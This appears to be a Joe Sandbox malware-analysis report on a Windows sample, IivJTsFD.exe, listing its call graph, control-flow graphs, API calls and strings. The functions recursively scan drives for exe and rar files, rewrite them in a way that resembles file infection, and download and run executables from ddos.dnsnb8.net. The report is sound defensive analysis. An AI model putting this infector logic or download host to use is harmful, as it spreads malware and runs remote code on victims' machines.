                              callgraph 0 Function_002567A4 1 Function_002565A6 2 Function_00256834 3 Function_00256734 7 Function_00256A84 3->7 12 Function_00256D00 3->12 13 Function_00256B02 3->13 4 Function_002569B0 5 Function_002528B8 22 Function_00252692 5->22 24 Function_0025239D 5->24 36 Function_002529E2 5->36 37 Function_00251E6E 5->37 6 Function_00251638 10 Function_00251581 6->10 27 Function_0025139F 6->27 28 Function_00251099 6->28 30 Function_00251718 6->30 48 Function_00252C48 6->48 51 Function_002517D0 6->51 15 Function_0025680F 7->15 43 Function_00256CF2 7->43 8 Function_00256001 19 Function_0025600A 8->19 9 Function_00251C81 54 Function_0025185B 10->54 11 Function_00251000 11->51 12->4 35 Function_00256B63 12->35 12->43 13->35 14 Function_00252B8C 44 Function_00252B7D 14->44 47 Function_00252845 14->47 16 Function_0025120E 17 Function_00251D8A 18 Function_00251B8A 18->54 20 Function_00251915 21 Function_00256014 23 Function_00256012 24->20 25 Function_0025189D 24->25 24->36 26 Function_0025119F 27->16 27->26 29 Function_00251319 27->29 28->11 28->54 41 Function_00252CF0 30->41 31 Function_00252D9B 32 Function_002514E1 32->6 45 Function_00251AF9 32->45 33 Function_00252361 33->31 34 Function_00252D60 35->0 35->2 35->4 36->5 37->9 37->17 37->18 37->20 37->31 37->34 38 Function_00251C68 37->38 40 Function_00251DF6 37->40 37->45 37->54 39 Function_00256076 49 Function_002566C8 39->49 42 Function_00251973 42->54 46 Function_00256CF8 43->46 44->36 45->6 47->22 47->24 50 Function_0025274A 47->50 48->14 48->42 49->7 49->12 49->13 50->42 50->54 52 Function_0025235D 53 Function_00256159 53->49

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 101 2529e2-252a34 memset wsprintfA 102 252abc-252b21 memset * 2 FindFirstFileA call 2528b8 memset 101->102 103 252a3a-252a86 memset lstrlen lstrcpyn strrchr 101->103 110 252b61-252b6b FindNextFileA 102->110 103->102 105 252a88-252a98 103->105 105->102 106 252a9a-252aa7 lstrcmpiA 105->106 108 252b74-252b7a 106->108 109 252aad-252aba lstrlen 106->109 109->102 109->106 111 252b23-252b2a 110->111 112 252b6d-252b6e FindClose 110->112 113 252b4c-252b5c call 2528b8 111->113 114 252b2c-252b33 111->114 112->108 113->110 114->113 115 252b35-252b4a lstrcmpiA 114->115 115->112 115->113
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                              • String ID: %s*$C:\$Documents and Settings
                              • API String ID: 2826467728-110786608
                              • Opcode ID: 5639278f1f9dde3565bd13f5ce79666c81df7ec6dc92c94be84b33648746e6af
                              • Instruction ID: 88c21ee6ae57e6945dfe6ddbf084cf847d8832cbe92724d2f6863e6ec8d73466
                              • Opcode Fuzzy Hash: 5639278f1f9dde3565bd13f5ce79666c81df7ec6dc92c94be84b33648746e6af
                              • Instruction Fuzzy Hash: 614174B2414349EFD721DFA0EC4DEDB77ACEB85356F04082AF944D2091E634D65C8BAA

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 251099-2510b4 173 251199-25119c 172->173 174 2510ba-2510c7 172->174 175 2510c8-2510d4 174->175 176 251184-251190 175->176 177 2510da 175->177 176->175 178 251196-251198 176->178 179 251113-251162 call 25185b wsprintfA * 2 URLDownloadToFileA 177->179 178->173 182 2510dc-25110d call 251000 WinExec lstrlen 179->182 183 251168-251182 lstrlen Sleep 179->183 182->178 182->179 183->176 183->179
                              APIs
                                • Part of subcall function 0025185B: GetSystemTimeAsFileTime.KERNEL32(00251F92,00000000,?,00000000,?,?,?,00251F92,?,00000000,00000002), ref: 00251867
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251878
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251880
                                • Part of subcall function 0025185B: srand.MSVCRT ref: 00251890
                                • Part of subcall function 0025185B: rand.MSVCRT ref: 00251894
                              • WinExec.KERNEL32(?,00000005), ref: 002510F1
                              • lstrlen.KERNEL32(00254748), ref: 002510FA
                              • wsprintfA.USER32 ref: 0025112A
                              • wsprintfA.USER32 ref: 00251143
                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0025115B
                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00251169
                              • Sleep.KERNEL32 ref: 00251179
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG%$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1280626985-895877583
                              • Opcode ID: 0c93badea95ad759b4e56f00eb3f4a5b6dc2b390a7853347ff30cc46e99fd738
                              • Instruction ID: 5edf83533d02ffb4371d2b85ee696309b774eaf235175b56a109dbc92b8e0efc
                              • Opcode Fuzzy Hash: 0c93badea95ad759b4e56f00eb3f4a5b6dc2b390a7853347ff30cc46e99fd738
                              • Instruction Fuzzy Hash: 21218375920309BADB21EBA0EC49FAFFBBCAB0535BF114095E904A2050D7745FA8CF58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 216 251718-251733 GetSystemTimeAsFileTime 217 251735-251752 SHSetValueA 216->217 218 251754-251758 216->218 219 2517c6-2517cd 217->219 218->219 220 25175a-251784 SHGetValueA 218->220 220->219 221 251786-2517b3 call 252cf0 * 2 220->221 221->219 226 2517b5 221->226 227 2517b7-2517bd 226->227 228 2517bf 226->228 227->219 227->228 228->219
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251729
                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0025174C
                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0025177C
                              • __aulldiv.LIBCMT ref: 00251796
                              • __aulldiv.LIBCMT ref: 002517A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: TimeValue__aulldiv$FileSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$SOFTWARE\GTplus$Time
                              • API String ID: 541852442-809295866
                              • Opcode ID: e653847f1a2f0e1527966f016075962c1c51ec9141c7665b62a0d96894f23819
                              • Instruction ID: bd998aa6e761dc83e06393a55c42c12d015f1ad4e1ed6edfefb14e12e567578b
                              • Opcode Fuzzy Hash: e653847f1a2f0e1527966f016075962c1c51ec9141c7665b62a0d96894f23819
                              • Instruction Fuzzy Hash: 59119A71910205BBEB10DAA4CC89FEFBBBCEB05B56F108015FD04E6180D7709A6CCB68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 256076-256079 230 2560e0-2560eb 229->230 231 25607b-256080 229->231 234 2560ee-2560f4 230->234 232 2560f7-2560f8 231->232 233 256082-256085 231->233 236 2560fe-256106 232->236 237 2560fa-2560fc call 2566c8 232->237 235 2560f6 233->235 238 256087 233->238 234->235 235->232 240 256155-256189 VirtualFree 236->240 241 256108-25611d 236->241 237->236 238->234 242 256089-256095 238->242 247 25618c-256192 240->247 244 25611f-256121 241->244 245 256097-25609f 242->245 246 2560a1-2560aa 242->246 248 256151-256154 244->248 249 256123 244->249 245->246 250 2560b0-2560c1 VirtualAlloc 246->250 251 2561ba-2561c8 246->251 252 2560c7-2560cf 247->252 253 256198-2561b0 VirtualFree 247->253 248->240 249->248 256 256125-256128 249->256 250->252 254 256243-256251 251->254 255 2561ca-2561d7 251->255 252->247 263 2560d5-2560df VirtualAlloc 252->263 253->251 259 2561b2-2561b4 253->259 257 256264-25626f 254->257 258 256253 254->258 260 2561dd-2561e0 255->260 261 256134-25613b 256->261 262 25612a-25612e 256->262 265 256271-256276 257->265 264 256255-256258 258->264 259->251 260->254 266 2561e2-2561f2 260->266 273 256130-256132 261->273 274 25613d-25614f 261->274 262->261 262->273 263->230 264->257 269 25625a-256262 264->269 270 25627c-256289 265->270 271 256389-2563b1 VirtualProtect 265->271 272 2561f5-2561fe 266->272 269->264 287 256292-256298 270->287 288 25628b 270->288 277 2563b7-2563ba 271->277 275 256200-256203 272->275 276 25620c-256219 272->276 273->244 274->244 279 256205-256208 275->279 280 25621b-256228 275->280 281 256238-25623f 276->281 282 2563fc-2563ff VirtualProtect 277->282 283 2563bc-2563c2 277->283 289 25622a-256236 279->289 290 25620a 279->290 280->281 281->272 285 256241 281->285 286 256400-256416 282->286 283->283 284 2563c4 283->284 284->282 291 2563c6-2563cf 284->291 285->260 292 256420-256425 286->292 293 256418-25641d 286->293 294 2562a2-2562ac 287->294 288->287 289->281 290->281 295 2563d4-2563d8 291->295 296 2563d1 291->296 297 2562b1-2562c8 294->297 298 2562ae 294->298 301 2563dd-2563e1 295->301 302 2563da 295->302 296->295 299 256373-256384 297->299 300 2562ce-2562d4 297->300 298->297 299->265 303 2562d6-2562d9 300->303 304 2562da-2562f1 300->304 305 2563e7-2563fa VirtualProtect 301->305 306 2563e3 301->306 302->301 303->304 308 256365-25636e 304->308 309 2562f3-2562f9 304->309 305->277 305->282 306->305 308->294 310 256314-256326 309->310 311 2562fb-25630f 309->311 313 25634c-256360 310->313 314 256328-25634a 310->314 312 256426-2564a9 311->312 323 256519-25651c 312->323 324 2564ab-2564c0 312->324 313->312 314->308 325 256583-256587 323->325 326 25651d-25651e 323->326 330 256535-256537 324->330 331 2564c2 324->331 328 256588-25658b 325->328 329 256522-256533 326->329 332 2565a1-2565a3 328->332 333 25658d-25658f 328->333 329->330 334 256539 330->334 335 25659a 330->335 336 2564c5-2564cd 331->336 337 2564f8 331->337 340 256591-256593 333->340 341 2565b4 334->341 342 25653b-256541 334->342 343 25659b-25659d 335->343 344 256542-256545 336->344 345 2564cf-2564d4 336->345 338 25656c-25656f 337->338 339 2564fa-2564fe 337->339 351 256572 338->351 339->351 352 256500 339->352 340->343 353 256595 340->353 350 2565be-256608 341->350 342->344 343->340 346 25659f 343->346 347 25654d-256550 344->347 348 256517-256518 345->348 349 2564d6-2564d9 345->349 346->328 347->350 354 256552-256556 347->354 348->323 349->347 355 2564db-2564f5 349->355 356 256573-256576 351->356 352->329 357 256502 352->357 353->335 358 256578-25657f 354->358 359 256558-256569 354->359 355->337 356->358 357->356 360 256504-256513 357->360 358->325 359->338 360->330 362 256515 360->362 362->348
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 002560BE
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002560DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00256189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002561A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: cba2ea997ace53cba84f36e9fe489942bd1c8e6b61163523fca389332fdb48b8
                              • Instruction ID: 0a4e86df703e199fdf4a9cffd2a64f7bf9b7ef2d5ec94155cb859fc09c73f706
                              • Opcode Fuzzy Hash: cba2ea997ace53cba84f36e9fe489942bd1c8e6b61163523fca389332fdb48b8
                              • Instruction Fuzzy Hash: C91279B15287869FDB318F24CC497EA3BB4EF02311F98459DDC898B293D774A928C758

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 252b8c-252bc6 memset GetLogicalDriveStringsA 365 252c09-252c28 WaitForMultipleObjects 364->365 366 252bc8-252bcc 364->366 369 252c3c-252c45 365->369 370 252c2a-252c3a CreateThread 365->370 367 252bce-252bd0 366->367 368 252bfa-252c07 lstrlen 366->368 367->368 371 252bd2-252bdc GetDriveTypeA 367->371 368->365 368->366 370->369 371->368 372 252bde-252be1 371->372 372->368 373 252be3-252bf6 CreateThread 372->373 373->368
                              APIs
                              • memset.MSVCRT ref: 00252BA6
                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00252BB4
                              • GetDriveTypeA.KERNEL32(?), ref: 00252BD3
                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00252BEE
                              • lstrlen.KERNEL32(?), ref: 00252BFB
                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00252C16
                              • CreateThread.KERNEL32(00000000,00000000,00252845,00000000,00000000,00000000), ref: 00252C3A
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                              • String ID:
                              • API String ID: 1073171358-0
                              • Opcode ID: 0ef067104aa86e3f2caa8ba07a7f2655df45630d9e0ed29bf641de160582b0a4
                              • Instruction ID: 0b980c0ff2d0232149ce2a00e79ac7782b4f616892088e4c02b10a9e359955a3
                              • Opcode Fuzzy Hash: 0ef067104aa86e3f2caa8ba07a7f2655df45630d9e0ed29bf641de160582b0a4
                              • Instruction Fuzzy Hash: E421A4B181034DEFD720EF64AC88EAE7B6DFB0635AB150115FC4292191D7308D5ECB68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 251e6e-251e95 call 252d60 3 251e97 call 251d8a 0->3 4 251e9c-251eaa call 251df6 0->4 3->4 8 251eb0-251ed9 SetFileAttributesA CreateFileA 4->8 9 252332 4->9 8->9 10 251edf-251f28 call 251915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 252338-25233b 9->11 10->9 18 251f2e-251f39 10->18 13 252346-252349 11->13 14 25233d-252340 UnmapViewOfFile 11->14 16 252350-252354 13->16 17 25234b-25234e CloseHandle 13->17 14->13 19 252356-25235b CloseHandle 16->19 20 252391-25239a call 252d9b 16->20 17->16 18->9 22 251f3f-251f56 18->22 19->20 22->9 24 251f5c-251f64 22->24 24->9 25 251f6a-251f70 24->25 25->9 26 251f76-251f87 call 251c81 25->26 26->9 29 251f8d-251fa7 call 25185b call 251c81 26->29 29->9 34 251fad-251fb4 29->34 35 252024-252045 34->35 36 251fb6-251fc5 call 251af9 34->36 35->9 37 25204b-25204e 35->37 36->35 44 251fc7-251fd2 36->44 39 252070-2520f4 call 251af9 * 2 call 251c68 * 2 memset * 2 37->39 40 252050-252053 37->40 62 2520f5-2520fe 39->62 42 252056-25205a 40->42 42->39 45 25205c-252061 42->45 44->9 47 251fd8-251fe7 44->47 45->9 48 252067-25206e 45->48 50 251fef-252006 call 251af9 47->50 51 251fe9-251fec 47->51 48->42 57 252013-25201e FlushViewOfFile 50->57 58 252008-25200e call 251c68 50->58 51->50 57->35 58->57 63 252130-252139 62->63 64 252100-252114 62->64 67 25213c-252142 63->67 65 252116-25212a 64->65 66 25212d-25212e 64->66 65->66 66->62 68 252144-252150 67->68 69 25215c 67->69 70 252157-25215a 68->70 71 252152-252154 68->71 72 25215f-252162 69->72 70->67 71->70 73 252164-252171 72->73 74 252181-252184 72->74 75 252177-25217e 73->75 76 25232a-25232d 73->76 77 252186 74->77 78 25218d-2521ba call 251c68 74->78 75->74 76->72 77->78 81 2521d3-25220b call 251c81 call 251c68 78->81 82 2521bc-2521d0 call 251c68 78->82 89 25220d-252218 call 251c68 81->89 90 25221b-25221e 81->90 82->81 89->90 92 252226-252328 memcpy UnmapViewOfFile CloseHandle call 251b8a call 25185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 251915 CloseHandle 90->92 93 252220-252223 90->93 92->11 93->92
                              APIs
                              • SetFileAttributesA.KERNEL32(?,00000080,?,002532B0,00000164,00252986,?), ref: 00251EB9
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00251ECD
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00251EF3
                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00251F07
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00251F1D
                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0025201E
                              • memset.MSVCRT ref: 002520D8
                              • memset.MSVCRT ref: 002520EA
                              • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025222D
                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00252238
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025224A
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522C6
                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522CB
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522DD
                              • WriteFile.KERNEL32(000000FF,00254008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522F7
                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025230D
                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00252322
                              • UnmapViewOfFile.KERNEL32(?,?,002532B0,00000164,00252986,?), ref: 00252340
                              • CloseHandle.KERNEL32(?,?,002532B0,00000164,00252986,?), ref: 0025234E
                              • CloseHandle.KERNEL32(000000FF,?,002532B0,00000164,00252986,?), ref: 00252359
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                              • String ID: .@%$5@%$<@%$C@%$m@%
                              • API String ID: 3043204753-1856539476
                              • Opcode ID: 364edc38a02a5e98076a795911278ae05a26c6e0c6799e6450ec06e4ce37756f
                              • Instruction ID: f596a3ae50297ca4fcbc869463becfe5e163233ade6848aa1b8c4dc7deda682d
                              • Opcode Fuzzy Hash: 364edc38a02a5e98076a795911278ae05a26c6e0c6799e6450ec06e4ce37756f
                              • Instruction Fuzzy Hash: 19F1A571910309EFCB10DFA4DC85AADBBB5FF09316F104529E909A7291D730ADA9CF58

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 251973-25199a PathFileExistsA 118 251ac7-251acc 117->118 119 2519a0-2519aa 117->119 121 251ad0-251ad5 118->121 122 251ace 118->122 120 2519af-2519c2 CreateFileA 119->120 125 2519c4-2519d3 Sleep 120->125 126 251a28-251a36 GetFileSize 120->126 123 251ad7-251ad9 121->123 124 251af0-251af6 121->124 122->121 123->124 125->120 127 2519d5-251a0b call 25185b wsprintfA CopyFileA 125->127 128 251a87-251a8b 126->128 129 251a38-251a3b 126->129 127->126 143 251a0d-251a26 CreateFileA 127->143 131 251a96-251a9a 128->131 132 251a8d-251a90 CloseHandle 128->132 129->128 130 251a3d-251a51 VirtualAlloc 129->130 130->128 134 251a53-251a57 130->134 135 251aad-251ab1 131->135 136 251a9c 131->136 132->131 138 251a80 134->138 139 251a59-251a6d ReadFile 134->139 141 251ab3-251ab6 135->141 142 251adb-251ae0 135->142 140 251aa0-251aa7 DeleteFileA 136->140 138->128 139->128 144 251a6f-251a7e 139->144 140->135 141->118 147 251ab8-251ac1 VirtualFree 141->147 145 251ae7-251aec 142->145 146 251ae2-251ae5 142->146 143->126 148 251a9e 143->148 144->138 144->139 145->124 149 251aee 145->149 146->145 147->118 148->140 149->124
                              APIs
                              • PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
                              • Sleep.KERNEL32(00000064), ref: 002519C6
                              • wsprintfA.USER32 ref: 002519EC
                              • CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
                              • GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65
                              • CloseHandle.KERNEL32(000000FF), ref: 00251A90
                              • DeleteFileA.KERNEL32(?), ref: 00251AA7
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00251AC1
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 0025197C
                              • %s%.8X.data, xrefs: 002519E6
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 002519DB
                              • \N%`N%, xrefs: 00251980
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                              • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$\N%`N%
                              • API String ID: 716042067-756885908
                              • Opcode ID: 01831d23bce8bbd4e357046129e1d17cdbd5223e940f2a34f9604367c84db37e
                              • Instruction ID: 47864c7604b38f13a52a131ee2097e57aba6eb07ab59751d97a7c632feedbe29
                              • Opcode Fuzzy Hash: 01831d23bce8bbd4e357046129e1d17cdbd5223e940f2a34f9604367c84db37e
                              • Instruction Fuzzy Hash: 9F51607191121AEFCB12DF98DC88AAEBBB8FB05356F104569F915E2190C3709E68CF94

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 2528b8-2528ff memset wsprintfA 151 252905-25290d 150->151 152 2529db-2529df 150->152 151->152 153 252913-252919 151->153 154 252956-252965 strrchr 153->154 155 25291b-25294c memset wsprintfA call 2529e2 153->155 154->152 156 252967-252978 lstrcmpiA 154->156 158 252951 155->158 159 252988-252992 lstrcmpiA 156->159 160 25297a-252981 call 251e6e 156->160 158->152 159->152 162 252994-25299b 159->162 163 252986 160->163 164 2529ad-2529c9 strstr 162->164 165 25299d-2529a3 162->165 163->152 167 2529d3-2529d6 call 252692 164->167 168 2529cb-2529d1 call 25239d 164->168 165->164 166 2529a5-2529a7 lstrcpy 165->166 166->164 167->152 168->152
                              APIs
                              • memset.MSVCRT ref: 002528D3
                              • wsprintfA.USER32 ref: 002528F7
                              • memset.MSVCRT ref: 00252925
                              • wsprintfA.USER32 ref: 00252940
                                • Part of subcall function 002529E2: memset.MSVCRT ref: 00252A02
                                • Part of subcall function 002529E2: wsprintfA.USER32 ref: 00252A1A
                                • Part of subcall function 002529E2: memset.MSVCRT ref: 00252A44
                                • Part of subcall function 002529E2: lstrlen.KERNEL32(?), ref: 00252A54
                                • Part of subcall function 002529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00252A6C
                                • Part of subcall function 002529E2: strrchr.MSVCRT ref: 00252A7C
                                • Part of subcall function 002529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00252A9F
                                • Part of subcall function 002529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00252AAE
                                • Part of subcall function 002529E2: memset.MSVCRT ref: 00252AC6
                                • Part of subcall function 002529E2: memset.MSVCRT ref: 00252ADA
                                • Part of subcall function 002529E2: FindFirstFileA.KERNEL32(?,?), ref: 00252AEF
                                • Part of subcall function 002529E2: memset.MSVCRT ref: 00252B13
                              • strrchr.MSVCRT ref: 00252959
                              • lstrcmpiA.KERNEL32(00000001,exe), ref: 00252974
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true
                              • Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd
                              Similarity
                              • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                              • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                              • API String ID: 3004273771-3007274656
                              • Opcode ID: 7ed8d6c5eca3960cb5d598091963e763f45ef2a5a2e53785405b48745bbce812
                              • Instruction ID: 3a65f2b2754e86a8bcc2d3662852b970c48a5c4846abd3be6da3589ca69fd17c
                              • Opcode Fuzzy Hash: 7ed8d6c5eca3960cb5d598091963e763f45ef2a5a2e53785405b48745bbce812
                              • Instruction Fuzzy Hash: 5331B571950309ABDB20EB64DC89FDA776CEB12352F140452FD45E21C1E6B4EAEC8B68

                              Control-flow Graph

                              APIs
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0025164F
                              • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0025165B
